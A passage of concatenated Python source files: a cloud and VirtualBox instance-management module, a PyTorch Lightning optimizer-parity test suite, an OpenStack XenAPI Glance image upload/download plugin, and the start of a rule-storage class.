components.monitoring_name, URL_access = monitoring_ip, state = monitoring_state) session.add(new_component_info) session.commit() session.refresh(new_component_info) return {"message": "Provisoning Components"} # Function to update details of the component def update_component_info(session: Session, _username: str, _componentname: str, _getstate: str): component_info = get_component_info_by_component_id(session, _username, _componentname) if component_info is None: raise ComponentInfoNotFoundError # Connect to EC2 ec2 = boto3.resource('ec2') # Connect to vbox vbox = virtualbox.VirtualBox() # Vb update for state if component_info.resource == "virtualbox": # Check if stopping if _getstate == "stop": # Stop the vb machine subprocess.run(["VBoxManage", "controlvm", _componentname, "pause"], shell = False) # For stopping an vb instance # Get the machine to receive the new machine state vm = vbox.find_machine(_componentname) vbmachine_state = machineStates(vm.state).name component_info.state = vbmachine_state session.commit() session.refresh(component_info) # Check if starting elif _getstate == "start": #Start the vb machine subprocess.run(["VBoxManage", "controlvm", _componentname, "resume"], shell = False) # For starting an vb instance # Get the machine to receive the new machine state vm = vbox.find_machine(_componentname) vbmachine_state = machineStates(vm.state).name component_info.state = vbmachine_state session.commit() session.refresh(component_info) # Aws update for state elif component_info.resource == "aws": # Check if starting if _getstate == "stop": #Stop the aws machine ec2 = boto3.resource('ec2') ec2.instances.filter(Filters=[{ "Name": "tag:Name", "Values": [_componentname]}, ]).stop() # For halting an specfic ec2 instance time.sleep(40) current_instances = ec2.instances.filter(Filters=[ {"Name": "tag:Name", "Values":[_componentname]}]) for instance in current_instances: for tag in instance.tags: if 'Name'in tag['Key']: name = tag['Value'] # Get the instance state awsmachine_state = instance.state['Name'] component_info.state = awsmachine_state session.commit() session.refresh(component_info) elif _getstate == "start": #Start the aws machine ec2 = boto3.resource('ec2') ec2.instances.filter(Filters=[{ "Name": "tag:Name", "Values": [_componentname]}, ]).start() # For starting an specfic ec2 instance time.sleep(40) current_instances = ec2.instances.filter(Filters=[ {"Name": "tag:Name", "Values":[_componentname]}]) for instance in current_instances: for tag in instance.tags: if 'Name'in tag['Key']: name = tag['Value'] # Get the instance state awsmachine_state = instance.state['Name'] component_info.state = awsmachine_state session.commit() session.refresh(component_info) return component_info # Function to delete a component info from the db def delete_component_info(session: Session, _username: str, _componentname: str): component_info = get_component_info_by_component_id(session, _username, _componentname) if component_info is None: raise ComponentInfoNotFoundError # Connect to EC2 ec2 = boto3.resource('ec2') # Connect to vbox vbox = virtualbox.VirtualBox() # Delete for vb if component_info.resource == "virtualbox": vm = vbox.find_machine(_componentname) vm.remove(delete=True) # For destroying an vb instance session.delete(component_info) session.commit() message = {"message": "{} VB Instance Destroyed.".format(_componentname)} # Delete for aws elif component_info.resource == "aws": ec2.instances.filter(Filters=[{ "Name": "tag:Name", "Values": [_componentname]}]).terminate() # For terminating an specfic ec2 instance session.delete(component_info) session.commit() message = {"message": "{} AWS Instance Destroyed.".format(_componentname)} return message # Copyright The PyTorch Lightning team. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from collections import Callable from copy import deepcopy from typing import Optional from unittest.mock import patch import numpy as np import pytest import torch from torch.optim import Optimizer import pytorch_lightning as pl from pytorch_lightning import seed_everything, Trainer from pytorch_lightning.callbacks import ModelCheckpoint from pytorch_lightning.core.optimizer import LightningOptimizer from tests.base.boring_model import BoringModel # TODO: # For both automatic / manual optimization # - Test dp, ddp, ddp2 # - Apex # - Random accumulated_grad_batches (bug) # - Multiple optimizers class BaseParityAutomaticOptimizationModel(BoringModel): def __init__( self, optimizer_cls, optimizer_is_mocked=False, accumulate_grad_batches=None, lr=0.1 ): super().__init__() self.optimizer_cls = optimizer_cls self.losses = [] self.grads = [] self.on_before_zero_grad_count = 0 self.optimizer_is_mocked = optimizer_is_mocked self.grad_checked = False self.accumulate_grad_batches = accumulate_grad_batches self.lr = lr def on_before_zero_grad(self, optimizer): self.on_before_zero_grad_count += 1 if self.layer.weight.grad is not None: self.grads.append(self.layer.weight.grad.clone()) def configure_optimizers(self): optimizer = self.optimizer_cls(self.layer.parameters(), lr=self.lr) assert isinstance(optimizer, Optimizer) return optimizer def training_step(self, batch, batch_idx): output = self.layer(batch) loss = self.loss(batch, output) self.losses.append(loss.detach().item()) return {"loss": loss} class AutomaticOptimizationPurePytorchOptimizerModel(BaseParityAutomaticOptimizationModel): def training_step(self, batch, batch_idx): output = self.layer(batch) loss = self.loss(batch, output) self.losses.append(loss.detach().item()) loss /= float(self.accumulate_grad_batches) return {"loss": loss} def optimizer_step( self, epoch: int = None, batch_idx: int = None, optimizer: Optimizer = None, optimizer_idx: int = None, optimizer_closure: Optional[Callable] = None, on_tpu: bool = None, using_native_amp: bool = None, using_lbfgs: bool = None, ) -> None: """ Override the optimizer step to define manual optimizer steps, as we use LightningOptimizer wrapper as standard """ # Get the unwrapped optimizer optimizer = optimizer.optimizer assert not isinstance(optimizer, LightningOptimizer) optimizer_closure() assert self.trainer.accumulate_grad_batches == 1 if should_accumulate(self.trainer, self.accumulate_grad_batches): return self.grad_checked = True assert torch.abs(self.layer.weight.grad).sum() > 0 optimizer.step() self.on_before_zero_grad_count += 1 optimizer.zero_grad() if not self.optimizer_is_mocked: assert torch.abs(self.layer.weight.grad).sum() == 0 class AutomaticOptimizationPurePytorchAMPOptimizerModel(BaseParityAutomaticOptimizationModel): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.scaler = torch.cuda.amp.GradScaler() def training_step(self, batch, batch_idx): with torch.cuda.amp.autocast(): output = self.layer(batch) loss = self.loss(batch, output) self.losses.append(loss.detach().item()) loss /= float(self.accumulate_grad_batches) loss = self.scaler.scale(loss) return {"loss": loss} def optimizer_step( self, epoch: int = None, batch_idx: int = None, optimizer: Optimizer = None, optimizer_idx: int = None, optimizer_closure: Optional[Callable] = None, on_tpu: bool = None, using_native_amp: bool = None, using_lbfgs: bool = None, ) -> None: """ Override the optimizer step to define manual optimizer steps, as we use LightningOptimizer wrapper as standard """ # Get the unwrapped optimizer optimizer = optimizer.optimizer assert not isinstance(optimizer, LightningOptimizer) optimizer_closure() assert self.trainer.accumulate_grad_batches == 1 if should_accumulate(self.trainer, self.accumulate_grad_batches): return self.scaler.unscale_(optimizer) self.grad_checked = True assert torch.abs(self.layer.weight.grad).sum() > 0 self.scaler.step(optimizer) self.scaler.update() self.on_before_zero_grad_count += 1 optimizer.zero_grad() if not self.optimizer_is_mocked: assert torch.abs(self.layer.weight.grad).sum() == 0 def should_accumulate(trainer, accumulate_grad_batches): accumulation_done = (trainer.batch_idx + 1) == trainer.num_training_batches is_final_batch = (trainer.batch_idx + 1) % accumulate_grad_batches == 0 return not (accumulation_done or is_final_batch) @pytest.mark.parametrize(["precision", "amp_backend", "gpus"], [ pytest.param(32, "native", 0), pytest.param(16, "native", 1, marks=pytest.mark.skipif(not torch.cuda.is_available(), reason='Requires GPU')), ]) @pytest.mark.parametrize('accumulate_grad_batches', [1, 7]) def test_lightning_optimizer_and_no_lightning_optimizer_equality( tmpdir, precision, amp_backend, gpus, accumulate_grad_batches, ): if accumulate_grad_batches > 1: accumulate_grad_batches = np.random.randint(1, accumulate_grad_batches) vanilla_model_cls = AutomaticOptimizationPurePytorchAMPOptimizerModel if precision == 16 \ else AutomaticOptimizationPurePytorchOptimizerModel run_lightning_optimizer_equality( BaseParityAutomaticOptimizationModel, vanilla_model_cls, precision=precision, default_root_dir=tmpdir, max_epochs=1, limit_train_batches=5, accumulate_grad_batches=accumulate_grad_batches, amp_backend=amp_backend, gpus=gpus ) @pytest.mark.parametrize(["precision", "amp_backend", "gpus"], [ pytest.param(32, "native", 0), ]) @pytest.mark.parametrize('accumulate_grad_batches', [1]) def test_lightning_optimizer_and_no_lightning_optimizer_equality_check_optim_calls( tmpdir, precision, amp_backend, gpus, accumulate_grad_batches, ): vanilla_model_cls = AutomaticOptimizationPurePytorchAMPOptimizerModel if precision == 16 \ else AutomaticOptimizationPurePytorchOptimizerModel with patch("torch.optim.SGD.step") as mock_sgd_step, \ patch("torch.optim.Adam.step") as mock_adam_step, \ patch("torch.optim.SGD.zero_grad") as mock_sgd_zero_grad, \ patch("torch.optim.Adam.zero_grad") as mock_adam_zero_grad: max_epochs = 2 limit_train_batches = 10 # Run equality test using Lightning Optimizer run_lightning_optimizer_equality( BaseParityAutomaticOptimizationModel, vanilla_model_cls, default_root_dir=tmpdir, optimizer_is_mocked=True, accumulate_grad_batches=accumulate_grad_batches, max_epochs=max_epochs, limit_train_batches=limit_train_batches, amp_backend=amp_backend, precision=precision, gpus=gpus ) expected_num_batches = max_epochs * limit_train_batches assert mock_sgd_step.call_count == (expected_num_batches // accumulate_grad_batches) assert mock_sgd_zero_grad.call_count == (expected_num_batches // accumulate_grad_batches) assert mock_sgd_step.call_count == mock_adam_step.call_count assert mock_sgd_step.call_count == mock_adam_step.call_count def train_with_restore(tmpdir, model_cls, restore_from=None): # init model if restore_from is not None: seed_everything(42) model = model_cls(torch.optim.Adam, accumulate_grad_batches=1, lr=10e-1) ckpt_saver = ModelCheckpoint(dirpath=f"{tmpdir}/mckpt", save_last=True, save_weights_only=False) # Initialize a trainer trainer = pl.Trainer( default_root_dir=tmpdir, max_epochs=(1 + bool(restore_from)), limit_train_batches=8, callbacks=([ckpt_saver] if restore_from is None else []), checkpoint_callback=(not restore_from), resume_from_checkpoint=restore_from, num_sanity_val_steps=0, ) # Train the model trainer.fit(model) return ckpt_saver.best_model_path, model def test_parity_checkpointing(tmpdir): """ This test assert that reloading a checkpoint and finetunning gives the same result with / without LightningOptimizer """ # Initial train run of the model. seed_everything(0) ckpt_path, first_epoch_pl_optimizer_model = train_with_restore( tmpdir, model_cls=BaseParityAutomaticOptimizationModel, restore_from=None) assert "last" in ckpt_path _, second_epoch_pl_optimizer_model = train_with_restore( tmpdir, model_cls=BaseParityAutomaticOptimizationModel, restore_from=ckpt_path) seed_everything(0) ckpt_path, first_epoch_pure_pytorch_optimizer_model = train_with_restore( tmpdir, model_cls=AutomaticOptimizationPurePytorchOptimizerModel, restore_from=None) _, second_epoch_pure_pytorch_optimizer_model = train_with_restore( tmpdir, model_cls=AutomaticOptimizationPurePytorchOptimizerModel, restore_from=ckpt_path) assert first_epoch_pl_optimizer_model.losses == first_epoch_pure_pytorch_optimizer_model.losses assert second_epoch_pl_optimizer_model.losses == second_epoch_pure_pytorch_optimizer_model.losses def run_lightning_optimizer_equality( lightning_model_cls, vanilla_model_cls, optimizer_is_mocked=False, **trainer_kwargs, ): trainer_kwargs = { "limit_val_batches": 0, **trainer_kwargs } expected_num_batches = trainer_kwargs["max_epochs"] * trainer_kwargs["limit_train_batches"] accumulate_grad_batches = trainer_kwargs["accumulate_grad_batches"] pl_optimizer_initial_model_weights, pl_optimizer_model = train_specific_optimizer_model( lightning_model_cls, torch.optim.SGD, expected_num_batches=expected_num_batches, optimizer_is_mocked=optimizer_is_mocked, **trainer_kwargs, ) pure_pytorch_optimizer_initial_model_weights, pure_pytorch_optimizer_model = train_specific_optimizer_model( vanilla_model_cls, torch.optim.Adam if optimizer_is_mocked else torch.optim.SGD, expected_num_batches=expected_num_batches, optimizer_is_mocked=optimizer_is_mocked, replace_optimizer_step_with_pure_pytorch=True, **trainer_kwargs, ) if not optimizer_is_mocked: assert_model_equality( pl_optimizer_initial_model_weights=pl_optimizer_initial_model_weights, pl_optimizer_model=pl_optimizer_model, pure_pytorch_optimizer_initial_model_weights=pure_pytorch_optimizer_initial_model_weights, pure_pytorch_optimizer_model=pure_pytorch_optimizer_model, expected_num_batches=expected_num_batches, precision=trainer_kwargs["precision"] ) def assert_model_equality( pl_optimizer_initial_model_weights, pl_optimizer_model, pure_pytorch_optimizer_initial_model_weights, pure_pytorch_optimizer_model, expected_num_batches, precision, ): assert torch.equal(pl_optimizer_initial_model_weights, pure_pytorch_optimizer_initial_model_weights) assert len(pl_optimizer_model.losses) == expected_num_batches assert pure_pytorch_optimizer_model.grad_checked assert not torch.isnan(torch.FloatTensor(pl_optimizer_model.losses)).any() for pytorch_grad, pl_optim_grad in zip(pure_pytorch_optimizer_model.grads, pl_optimizer_model.grads): assert torch.equal(pytorch_grad, pl_optim_grad), 'Grad parameters are different' for pytorch_weight, pl_optim_weight in zip(pure_pytorch_optimizer_model.parameters(), pl_optimizer_model.parameters()): assert torch.equal(pytorch_weight, pl_optim_weight), 'Model parameters are different' # train function def train_specific_optimizer_model( model_cls, optimizer_cls, expected_num_batches, optimizer_is_mocked=False, replace_optimizer_step_with_pure_pytorch=False, **trainer_kwargs, ): seed_everything(42) trainer_kwargs = deepcopy(trainer_kwargs) model = model_cls( optimizer_cls=optimizer_cls, optimizer_is_mocked=optimizer_is_mocked, accumulate_grad_batches=trainer_kwargs["accumulate_grad_batches"], ) if replace_optimizer_step_with_pure_pytorch: # When running pure vanilla training, accumulate_grad_batches should be 1. trainer_kwargs["accumulate_grad_batches"] = 1 trainer_kwargs["precision"] = 32 expected_global_step = expected_num_batches // trainer_kwargs["accumulate_grad_batches"] initial_weights = model.layer.weight.clone() model.training_epoch_end = None trainer = Trainer( **trainer_kwargs ) trainer.fit(model) assert np.abs(trainer.global_step - expected_global_step) <= 2 return initial_weights, model #!/usr/bin/env python # Copyright (c) 2012 OpenStack Foundation # Copyright (c) 2010 Citrix Systems, Inc. # Copyright 2010 United States Government as represented by the # Administrator of the National Aeronautics and Space Administration. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # NOTE: XenServer still only supports Python 2.4 in it's dom0 userspace # which means the Nova xenapi plugins must use only Python 2.4 features # TODO(sfinucan): Resolve all 'noqa' items once the above is no longer true """Handle the uploading and downloading of images via Glance.""" try: import httplib except ImportError: from six.moves import http_client as httplib try: import json except ImportError: import simplejson as json import md5 # noqa import socket import urllib2 from urlparse import urlparse import pluginlib_nova import utils pluginlib_nova.configure_logging('glance') logging = pluginlib_nova.logging PluginError = pluginlib_nova.PluginError SOCKET_TIMEOUT_SECONDS = 90 class RetryableError(Exception): pass def _create_connection(scheme, netloc): if scheme == 'https': conn = httplib.HTTPSConnection(netloc) else: conn = httplib.HTTPConnection(netloc) conn.connect() return conn def _download_tarball_and_verify(request, staging_path): # NOTE(johngarbutt) By default, there is no timeout. # To ensure the script does not hang if we lose connection # to glance, we add this socket timeout. # This is here so there is no chance the timeout out has # been adjusted by other library calls. socket.setdefaulttimeout(SOCKET_TIMEOUT_SECONDS) try: response = urllib2.urlopen(request) except urllib2.HTTPError, error: # noqa raise RetryableError(error) except urllib2.URLError, error: # noqa raise RetryableError(error) except httplib.HTTPException, error: # noqa # httplib.HTTPException and derivatives (BadStatusLine in particular) # don't have a useful __repr__ or __str__ raise RetryableError('%s: %s' % (error.__class__.__name__, error)) url = request.get_full_url() logging.info("Reading image data from %s" % url) callback_data = {'bytes_read': 0} checksum = md5.new() def update_md5(chunk): callback_data['bytes_read'] += len(chunk) checksum.update(chunk) try: try: utils.extract_tarball(response, staging_path, callback=update_md5) except Exception, error: # noqa raise RetryableError(error) finally: bytes_read = callback_data['bytes_read'] logging.info("Read %d bytes from %s", bytes_read, url) # Use ETag if available, otherwise content-md5(v2) or # X-Image-Meta-Checksum(v1) etag = response.info().getheader('etag', None) if etag is None: etag = response.info().getheader('content-md5', None) if etag is None: etag = response.info().getheader('x-image-meta-checksum', None) # Verify checksum using ETag checksum = checksum.hexdigest() if etag is None: msg = "No ETag found for comparison to checksum %(checksum)s" logging.info(msg % {'checksum': checksum}) elif checksum != etag: msg = 'ETag %(etag)s does not match computed md5sum %(checksum)s' raise RetryableError(msg % {'checksum': checksum, 'etag': etag}) else: msg = "Verified image checksum %(checksum)s" logging.info(msg % {'checksum': checksum}) def _download_tarball_v1(sr_path, staging_path, image_id, glance_host, glance_port, glance_use_ssl, extra_headers): """Download the tarball image from Glance v1 and extract it into the staging area. Retry if there is any failure. """ if glance_use_ssl: scheme = 'https' else: scheme = 'http' endpoint = "%(scheme)s://%(glance_host)s:%(glance_port)d" % { 'scheme': scheme, 'glance_host': glance_host, 'glance_port': glance_port} _download_tarball_by_url_v1(sr_path, staging_path, image_id, endpoint, extra_headers) def _download_tarball_by_url_v1( sr_path, staging_path, image_id, glance_endpoint, extra_headers): """Download the tarball image from Glance v1 and extract it into the staging area. Retry if there is any failure. """ url = "%(glance_endpoint)s/v1/images/%(image_id)s" % { 'glance_endpoint': glance_endpoint, 'image_id': image_id} logging.info("Downloading %s with glance v1 api" % url) request = urllib2.Request(url, headers=extra_headers) try: _download_tarball_and_verify(request, staging_path) except Exception: logging.exception('Failed to retrieve %(url)s' % {'url': url}) raise def _download_tarball_by_url_v2( sr_path, staging_path, image_id, glance_endpoint, extra_headers): """Download the tarball image from Glance v2 and extract it into the staging area. Retry if there is any failure. """ url = "%(glance_endpoint)s/v2/images/%(image_id)s/file" % { 'glance_endpoint': glance_endpoint, 'image_id': image_id} logging.debug("Downloading %s with glance v2 api" % url) request = urllib2.Request(url, headers=extra_headers) try: _download_tarball_and_verify(request, staging_path) except Exception: logging.exception('Failed to retrieve %(url)s' % {'url': url}) raise def _upload_tarball_v1(staging_path, image_id, glance_host, glance_port, glance_use_ssl, extra_headers, properties): if glance_use_ssl: scheme = 'https' else: scheme = 'http' url = '%s://%s:%s' % (scheme, glance_host, glance_port) _upload_tarball_by_url_v1(staging_path, image_id, url, extra_headers, properties) def _upload_tarball_by_url_v1(staging_path, image_id, glance_endpoint, extra_headers, properties): """Create a tarball of the image and then stream that into Glance v1 using chunked-transfer-encoded HTTP. """ # NOTE(johngarbutt) By default, there is no timeout. # To ensure the script does not hang if we lose connection # to glance, we add this socket timeout. # This is here so there is no chance the timeout out has # been adjusted by other library calls. socket.setdefaulttimeout(SOCKET_TIMEOUT_SECONDS) logging.debug("Uploading image %s with glance v1 api" % image_id) url = "%(glance_endpoint)s/v1/images/%(image_id)s" % { 'glance_endpoint': glance_endpoint, 'image_id': image_id} logging.info("Writing image data to %s" % url) # NOTE(sdague): this is python 2.4, which means urlparse returns a # tuple, not a named tuple. # 0 - scheme # 1 - host:port (aka netloc) # 2 - path parts = urlparse(url) try: conn = _create_connection(parts[0], parts[1]) except Exception, error: # noqa logging.exception('Failed to connect %(url)s' % {'url': url}) raise RetryableError(error) try: validate_image_status_before_upload_v1(conn, url, extra_headers) try: # NOTE(sirp): httplib under python2.4 won't accept # a file-like object to request conn.putrequest('PUT', parts[2]) # NOTE(sirp): There is some confusion around OVF. Here's a summary # of where we currently stand: # 1. OVF as a container format is misnamed. We really should be # using OVA since that is the name for the container format; # OVF is the standard applied to the manifest file contained # within. # 2. We're currently uploading a vanilla tarball. In order to be # OVF/OVA compliant, we'll need to embed a minimal OVF # manifest as the first file. # NOTE(dprince): In order to preserve existing Glance properties # we set X-Glance-Registry-Purge-Props on this request. headers = { 'content-type': 'application/octet-stream', 'transfer-encoding': 'chunked', 'x-image-meta-is-public': 'False', 'x-image-meta-status': 'queued', 'x-image-meta-disk-format': 'vhd', 'x-image-meta-container-format': 'ovf', 'x-glance-registry-purge-props': 'False'} headers.update(**extra_headers) for key, value in properties.items(): header_key = "x-image-meta-property-%s" % key.replace('_', '-') headers[header_key] = str(value) for header, value in headers.items(): conn.putheader(header, value) conn.endheaders() except Exception, error: # noqa logging.exception('Failed to upload %(url)s' % {'url': url}) raise RetryableError(error) callback_data = {'bytes_written': 0} def send_chunked_transfer_encoded(chunk): chunk_len = len(chunk) callback_data['bytes_written'] += chunk_len try: conn.send("%x\r\n%s\r\n" % (chunk_len, chunk)) except Exception, error: # noqa logging.exception('Failed to upload when sending chunks') raise RetryableError(error) compression_level = properties.get('xenapi_image_compression_level') utils.create_tarball( None, staging_path, callback=send_chunked_transfer_encoded, compression_level=compression_level) send_chunked_transfer_encoded('') # Chunked-Transfer terminator bytes_written = callback_data['bytes_written'] logging.info("Wrote %d bytes to %s" % (bytes_written, url)) resp = conn.getresponse() if resp.status == httplib.OK: return logging.error("Unexpected response while writing image data to %s: " "Response Status: %i, Response body: %s" % (url, resp.status, resp.read())) check_resp_status_and_retry(resp, image_id, url) finally: conn.close() def _update_image_meta_v2(conn, image_id, extra_headers, properties): # NOTE(sirp): There is some confusion around OVF. Here's a summary # of where we currently stand: # 1. OVF as a container format is misnamed. We really should be # using OVA since that is the name for the container format; # OVF is the standard applied to the manifest file contained # within. # 2. We're currently uploading a vanilla tarball. In order to be # OVF/OVA compliant, we'll need to embed a minimal OVF # manifest as the first file. body = [ {"path": "/container_format", "value": "ovf", "op": "add"}, {"path": "/disk_format", "value": "vhd", "op": "add"}, {"path": "/visibility", "value": "private", "op": "add"}] headers = {'Content-Type': 'application/openstack-images-v2.1-json-patch'} headers.update(**extra_headers) for key, value in properties.items(): prop = {"path": "/%s" % key.replace('_', '-'), "value": key, "op": "add"} body.append(prop) body = json.dumps(body) conn.request('PATCH', '/v2/images/%s' % image_id, body=body, headers=headers) resp = conn.getresponse() resp.read() if resp.status == httplib.OK: return logging.error("Image meta was not updated. Status: %s, Reason: %s" % ( resp.status, resp.reason)) def _upload_tarball_by_url_v2(staging_path, image_id, glance_endpoint, extra_headers, properties): """Create a tarball of the image and then stream that into Glance v2 using chunked-transfer-encoded HTTP. """ # NOTE(johngarbutt) By default, there is no timeout. # To ensure the script does not hang if we lose connection # to glance, we add this socket timeout. # This is here so there is no chance the timeout out has # been adjusted by other library calls. socket.setdefaulttimeout(SOCKET_TIMEOUT_SECONDS) logging.debug("Uploading imaged %s with glance v2 api" % image_id) url = "%(glance_endpoint)s/v2/images/%(image_id)s/file" % { 'glance_endpoint': glance_endpoint, 'image_id': image_id} # NOTE(sdague): this is python 2.4, which means urlparse returns a # tuple, not a named tuple. # 0 - scheme # 1 - host:port (aka netloc) # 2 - path parts = urlparse(url) try: conn = _create_connection(parts[0], parts[1]) except Exception, error: # noqa raise RetryableError(error) try: _update_image_meta_v2(conn, image_id, extra_headers, properties) validate_image_status_before_upload_v2(conn, url, extra_headers) try: conn.connect() # NOTE(sirp): httplib under python2.4 won't accept # a file-like object to request conn.putrequest('PUT', parts[2]) headers = { 'content-type': 'application/octet-stream', 'transfer-encoding': 'chunked'} headers.update(**extra_headers) for header, value in headers.items(): conn.putheader(header, value) conn.endheaders() except Exception, error: # noqa logging.exception('Failed to upload %(url)s' % {'url': url}) raise RetryableError(error) callback_data = {'bytes_written': 0} def send_chunked_transfer_encoded(chunk): chunk_len = len(chunk) callback_data['bytes_written'] += chunk_len try: conn.send("%x\r\n%s\r\n" % (chunk_len, chunk)) except Exception, error: # noqa logging.exception('Failed to upload when sending chunks') raise RetryableError(error) compression_level = properties.get('xenapi_image_compression_level') utils.create_tarball( None, staging_path, callback=send_chunked_transfer_encoded, compression_level=compression_level) send_chunked_transfer_encoded('') # Chunked-Transfer terminator bytes_written = callback_data['bytes_written'] logging.info("Wrote %d bytes to %s" % (bytes_written, url)) resp = conn.getresponse() if resp.status == httplib.NO_CONTENT: return logging.error("Unexpected response while writing image data to %s: " "Response Status: %i, Response body: %s" % (url, resp.status, resp.read())) check_resp_status_and_retry(resp, image_id, url) finally: conn.close() def check_resp_status_and_retry(resp, image_id, url): # Note(Jesse): This branch sorts errors into those that are permanent, # those that are ephemeral, and those that are unexpected. if resp.status in (httplib.BAD_REQUEST, # 400 httplib.UNAUTHORIZED, # 401 httplib.PAYMENT_REQUIRED, # 402 httplib.FORBIDDEN, # 403 httplib.NOT_FOUND, # 404 httplib.METHOD_NOT_ALLOWED, # 405 httplib.NOT_ACCEPTABLE, # 406 httplib.PROXY_AUTHENTICATION_REQUIRED, # 407 httplib.CONFLICT, # 409 httplib.GONE, # 410 httplib.LENGTH_REQUIRED, # 411 httplib.PRECONDITION_FAILED, # 412 httplib.REQUEST_ENTITY_TOO_LARGE, # 413 httplib.REQUEST_URI_TOO_LONG, # 414 httplib.UNSUPPORTED_MEDIA_TYPE, # 415 httplib.REQUESTED_RANGE_NOT_SATISFIABLE, # 416 httplib.EXPECTATION_FAILED, # 417 httplib.UNPROCESSABLE_ENTITY, # 422 httplib.LOCKED, # 423 httplib.FAILED_DEPENDENCY, # 424 httplib.UPGRADE_REQUIRED, # 426 httplib.NOT_IMPLEMENTED, # 501 httplib.HTTP_VERSION_NOT_SUPPORTED, # 505 httplib.NOT_EXTENDED, # 510 ): raise PluginError("Got Permanent Error response [%i] while " "uploading image [%s] to glance [%s]" % (resp.status, image_id, url)) # NOTE(nikhil): Only a sub-set of the 500 errors are retryable. We # optimistically retry on 500 errors below. elif resp.status in (httplib.REQUEST_TIMEOUT, # 408 httplib.INTERNAL_SERVER_ERROR, # 500 httplib.BAD_GATEWAY, # 502 httplib.SERVICE_UNAVAILABLE, # 503 httplib.GATEWAY_TIMEOUT, # 504 httplib.INSUFFICIENT_STORAGE, # 507 ): raise RetryableError("Got Ephemeral Error response [%i] while " "uploading image [%s] to glance [%s]" % (resp.status, image_id, url)) else: # Note(Jesse): Assume unexpected errors are retryable. If you are # seeing this error message, the error should probably be added # to either the ephemeral or permanent error list. raise RetryableError("Got Unexpected Error response [%i] while " "uploading image [%s] to glance [%s]" % (resp.status, image_id, url)) def validate_image_status_before_upload_v1(conn, url, extra_headers): try: parts = urlparse(url) path = parts[2] image_id = path.split('/')[-1] # NOTE(nikhil): Attempt to determine if the Image has a status # of 'queued'. Because data will continued to be sent to Glance # until it has a chance to check the Image state, discover that # it is not 'active' and send back a 409. Hence, the data will be # unnecessarily buffered by Glance. This wastes time and bandwidth. # LP bug #1202785 conn.request('HEAD', path, headers=extra_headers) head_resp = conn.getresponse() # NOTE(nikhil): read the response to re-use the conn object. body_data = head_resp.read(8192) if len(body_data) > 8: err_msg = ('Cannot upload data for image %(image_id)s as the ' 'HEAD call had more than 8192 bytes of data in ' 'the response body.' % {'image_id': image_id}) raise PluginError("Got Permanent Error while uploading image " "[%s] to glance [%s]. " "Message: %s" % (image_id, url, err_msg)) else: head_resp.read() except Exception, error: # noqa logging.exception('Failed to HEAD the image %(image_id)s while ' 'checking image status before attempting to ' 'upload %(url)s' % {'image_id': image_id, 'url': url}) raise RetryableError(error) if head_resp.status != httplib.OK: logging.error("Unexpected response while doing a HEAD call " "to image %s , url = %s , Response Status: " "%i" % (image_id, url, head_resp.status)) check_resp_status_and_retry(head_resp, image_id, url) else: image_status = head_resp.getheader('x-image-meta-status') if image_status not in ('queued', ): err_msg = ('Cannot upload data for image %(image_id)s as the ' 'image status is %(image_status)s' % {'image_id': image_id, 'image_status': image_status}) logging.exception(err_msg) raise PluginError("Got Permanent Error while uploading image " "[%s] to glance [%s]. " "Message: %s" % (image_id, url, err_msg)) else: logging.info('Found image %(image_id)s in status ' '%(image_status)s. Attempting to ' 'upload.' % {'image_id': image_id, 'image_status': image_status}) def validate_image_status_before_upload_v2(conn, url, extra_headers): try: parts = urlparse(url) path = parts[2] image_id = path.split('/')[-2] # NOTE(nikhil): Attempt to determine if the Image has a status # of 'queued'. Because data will continued to be sent to Glance # until it has a chance to check the Image state, discover that # it is not 'active' and send back a 409. Hence, the data will be # unnecessarily buffered by Glance. This wastes time and bandwidth. # LP bug #1202785 conn.request('GET', '/v2/images/%s' % image_id, headers=extra_headers) get_resp = conn.getresponse() except Exception, error: # noqa logging.exception('Failed to GET the image %(image_id)s while ' 'checking image status before attempting to ' 'upload %(url)s' % {'image_id': image_id, 'url': url}) raise RetryableError(error) if get_resp.status != httplib.OK: logging.error("Unexpected response while doing a GET call " "to image %s , url = %s , Response Status: " "%i" % (image_id, url, get_resp.status)) check_resp_status_and_retry(get_resp, image_id, url) else: body = json.loads(get_resp.read()) image_status = body['status'] if image_status not in ('queued', ): err_msg = ('Cannot upload data for image %(image_id)s as the ' 'image status is %(image_status)s' % {'image_id': image_id, 'image_status': image_status}) logging.exception(err_msg) raise PluginError("Got Permanent Error while uploading image " "[%s] to glance [%s]. " "Message: %s" % (image_id, url, err_msg)) else: logging.info('Found image %(image_id)s in status ' '%(image_status)s. Attempting to ' 'upload.' % {'image_id': image_id, 'image_status': image_status}) get_resp.read() def download_vhd2(session, image_id, endpoint, uuid_stack, sr_path, extra_headers, api_version=1): """Download an image from Glance v2, unbundle it, and then deposit the VHDs into the storage repository. """ staging_path = utils.make_staging_area(sr_path) try: # Download tarball into staging area and extract it # TODO(mfedosin): remove this check when v1 is deprecated. if api_version == 1: _download_tarball_by_url_v1( sr_path, staging_path, image_id, endpoint, extra_headers) else: _download_tarball_by_url_v2( sr_path, staging_path, image_id, endpoint, extra_headers) # Move the VHDs from the staging area into the storage repository return utils.import_vhds(sr_path, staging_path, uuid_stack) finally: utils.cleanup_staging_area(staging_path) def upload_vhd2(session, vdi_uuids, image_id, endpoint, sr_path, extra_headers, properties, api_version=1): """Bundle the VHDs comprising an image and then stream them into Glance. """ staging_path = utils.make_staging_area(sr_path) try: utils.prepare_staging_area(sr_path, staging_path, vdi_uuids) # TODO(mfedosin): remove this check when v1 is deprecated. if api_version == 1: _upload_tarball_by_url_v1(staging_path, image_id, endpoint, extra_headers, properties) else: _upload_tarball_by_url_v2(staging_path, image_id, endpoint, extra_headers, properties) finally: utils.cleanup_staging_area(staging_path) if __name__ == '__main__': utils.register_plugin_calls(download_vhd2, upload_vhd2) miraculixx/pyrules10-100 class BaseStorage(object): def get_rule(self, name): raise NotImplementedError() def get_ruleset(self, 